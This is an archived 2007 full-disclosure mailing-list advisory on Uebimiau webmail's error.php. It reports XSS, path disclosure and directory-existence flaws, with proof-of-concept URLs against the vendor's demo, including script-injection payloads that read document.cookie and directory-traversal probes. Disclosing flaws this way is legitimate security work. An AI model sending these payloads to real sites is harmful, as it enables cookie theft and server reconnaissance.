Uebimiau Webmail Multiple Vulnerabilities

"Michal Majchrowicz" <[email protected]> Tue, 29 May 2007 00:13:15 +0200
Newsgroups gmane.comp.security.full-disclosure,gmane.comp.security.vulnerabilities.watch.general,gmane.comp.security.bugtraq
Message-ID <[email protected]>
--===============1301397624==
Content-Type: multipart/alternative; 
	boundary="----=_Part_45618_11972130.1180390395038"

------=_Part_45618_11972130.1180390395038
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

Synopsis: Multiple Vulnerabilities

Introduction:
Uebimiau is an open source webmail interface.

Details:
Uebimiau doesn't correctly handle the $_GET array in error.php. Many
vulnerabilities have been already discovered, but I would like to introduce
few new ones:
1) XSS
2) Three Web Server Directory Path Disclosure Vulnerabilities
3) Directory Existence Vulnerability

PoC:
<http://www.test.com/redirect.php/%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E?subject=server&server=test>
http://www.uebimiau.org/demo/pop3/error.php?selected_theme=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.uebimiau.org/demo/pop3/error.php?smarty=test
http://www.uebimiau.org/demo/pop3/error.php?selected_theme=test
http://www.uebimiau.org/demo/pop3/error.php?selected_theme=:
http://www.uebimiau.org/demo/pop3/error.php?selected_theme=/etc/apache2/../../var/www/web6/web/demo/pop3/themes/uebimiau/

Regards Michal Majchrowicz.
Hack.pl

------=_Part_45618_11972130.1180390395038
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

Synopsis: Multiple Vulnerabilities<br><br>Introduction:<br>Uebimiau is an open source webmail interface.<br><br>Details:<br>Uebimiau doesn&#39;t correctly handle the $_GET array in error.php. Many vulnerabilities have been already discovered, but I would like to introduce few new ones:
<br>1) XSS <br>2) Three Web Server Directory Path Disclosure Vulnerabilities<br>3) <span class="title">Directory Existence Vulnerability</span><br><br>PoC:<br><a href="http://www.test.com/redirect.php/%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E?subject=server&amp;server=test" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">
</a><a href="http://www.uebimiau.org/demo/pop3/error.php?selected_theme=%3Cscript%3Ealert(document.cookie)%3C/script%3E">http://www.uebimiau.org/demo/pop3/error.php?selected_theme=%3Cscript%3Ealert(document.cookie)%3C/script%3E
</a><br><a href="http://www.uebimiau.org/demo/pop3/error.php?smarty=test">http://www.uebimiau.org/demo/pop3/error.php?smarty=test</a><br><a href="http://www.uebimiau.org/demo/pop3/error.php?selected_theme=test">http://www.uebimiau.org/demo/pop3/error.php?selected_theme=test
</a><br><a href="http://www.uebimiau.org/demo/pop3/error.php?selected_theme=">http://www.uebimiau.org/demo/pop3/error.php?selected_theme=</a>:<br><a href="http://www.uebimiau.org/demo/pop3/error.php?selected_theme=/etc/apache2/../../var/www/web6/web/demo/pop3/themes/uebimiau/">
http://www.uebimiau.org/demo/pop3/error.php?selected_theme=/etc/apache2/../../var/www/web6/web/demo/pop3/themes/uebimiau/</a><br><br>Regards Michal Majchrowicz.<br>Hack.pl

------=_Part_45618_11972130.1180390395038--


--===============1301397624==
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--===============1301397624==--